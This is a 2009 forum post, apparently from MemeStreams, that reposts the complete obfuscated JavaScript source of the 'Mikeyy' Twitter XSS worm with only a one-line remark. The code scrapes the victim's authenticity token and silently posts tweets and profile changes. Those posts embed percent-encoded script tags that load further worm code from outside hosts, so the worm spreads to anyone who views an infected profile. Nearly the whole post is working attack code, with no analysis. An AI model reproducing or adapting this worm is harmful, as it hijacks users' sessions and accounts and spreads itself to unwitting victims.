MemeStreams | RE: Another Ajax powered XSS worm

RE: Another Ajax powered XSS worm
by Worthersee at 3:01 pm EDT, Apr 13, 2009
Cute obfuscation
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
 
function XHConn(){
  var _0x6687x2,_0x6687x3=false;
  try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
  catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
  catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
  catch(e) { _0x6687x2=false; }; }; };
  
  if (!_0x6687x2) { return null; } ;
  
  this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
    if (!_0x6687x2) { return false; };
    _0x6687x3=false;
    _0x6687x5=_0x6687x5[_0xc26a[0x3]]();
    try {
      if(_0x6687x5==_0xc26a[0x4]) {
        _0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4+_0xc26a[0x5]+_0x6687x6,true);
        _0x6687x6=_0xc26a[0x7];
      } else {
        _0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4,true);
        _0x6687x2[_0xc26a[0xb]](_0xc26a[0x8],_0xc26a[0x9]+_0x6687x4+_0xc26a[0xa]);
        _0x6687x2[_0xc26a[0xb]](_0xc26a[0xc],_0xc26a[0xd]);
      } ;
      _0x6687x2[_0xc26a[0xe]]=function () {
        if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
          _0x6687x3=true;
          _0x6687x7(_0x6687x2);
        } ;
      } ;
      _0x6687x2[_0xc26a[0x10]](_0x6687x6);
    } catch(z) {
      return false;
    } ;
    return true;
  } ;
  return this;
} ;
 
function urlencode(_0x6687x9) {
  var _0x6687xa={},_0x6687xb=[];
  var _0x6687xc=_0x6687x9.toString();
  var _0x6687xd=function (_0x6687xe,_0x6687xf,_0x6687x9) {
    var _0x6687xb=[];
    _0x6687xb=_0x6687x9[_0xc26a[0x11]](_0x6687xe);
    return _0x6687xb[_0xc26a[0x12]](_0x6687xf);
  } ;
  _0x6687xa[_0xc26a[0x13]]=_0xc26a[0x14];
  _0x6687xa[_0xc26a[0x15]]=_0xc26a[0x16];
  _0x6687xa[_0xc26a[0x17]]=_0xc26a[0x18];
  _0x6687xa[_0xc26a[0x19]]=_0xc26a[0x1a];
  _0x6687xa[_0xc26a[0x1b]]=_0xc26a[0x1c];
  _0x6687xa[_0xc26a[0x1d]]=_0xc26a[0x1e];
  _0x6687xa[_0xc26a[0x1f]]=_0xc26a[0x20];
  _0x6687xc=encodeURIComponent(_0x6687xc);
  for (search in _0x6687xa) {
    replace=_0x6687xa[search];
    _0x6687xc=_0x6687xd(search,replace,_0x6687xc);
  } ;
  return _0x6687xc[_0xc26a[0x22]](/(\%([a-z0-9]{2}))/g,function (_0x6687x10,_0x6687x11,_0x6687x12) {
    return _0xc26a[0x21]+_0x6687x12[_0xc26a[0x3]]();
  } );
  return _0x6687xc;
} ;
 
function wait() {
  var _0x6687x14=document[_0xc26a[0x24]][_0xc26a[0x23]];
  authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var _0x6687x15=authreg[_0xc26a[0x25]](_0x6687x14);
  _0x6687x15=_0x6687x15[0x1];
  
  var _0x6687x16= new Array();
  _0x6687x16[0x0]=_0xc26a[0x26];
  _0x6687x16[0x1]=_0xc26a[0x27];
  _0x6687x16[0x2]=_0xc26a[0x28];
  _0x6687x16[0x3]=_0xc26a[0x29];
  var _0x6687x17=_0x6687x16[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x16[_0xc26a[0x2b]])];
  var _0x6687x18=urlencode(_0x6687x17);
  
  var _0x6687x19= new Array();
  _0x6687x19[0x0]=_0xc26a[0x2d];
  _0x6687x19[0x1]=_0xc26a[0x2e];
  _0x6687x19[0x2]=_0xc26a[0x2f];
  var _0x6687x1a=_0x6687x19[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x19[_0xc26a[0x2b]])];
  var _0x6687x1b=urlencode(_0x6687x1a);
  
  var _0x6687x1c= new XHConn();
  _0x6687x1c[_0xc26a[0x2]](_0xc26a[0x30],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x33]+_0x6687x18+_0xc26a[0x34]);
  
  var _0x6687x1d= new XHConn();
  _0x6687x1d[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
  
  var _0x6687x1e= new XHConn();
  _0x6687x1e[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
  
  var _0x6687x1f= new XHConn();
  _0x6687x1f[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
  
  var _0x6687x20= new XHConn();
  _0x6687x20[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
  
  var _0x6687x21= new XHConn();
  _0x6687x21[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
  
  var _0x6687x22= new XHConn();
  _0x6687x22[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
} ;
setTimeout(_0xc26a[0x3b],0xdac);

</pre>
RE: Another Ajax powered XSS worm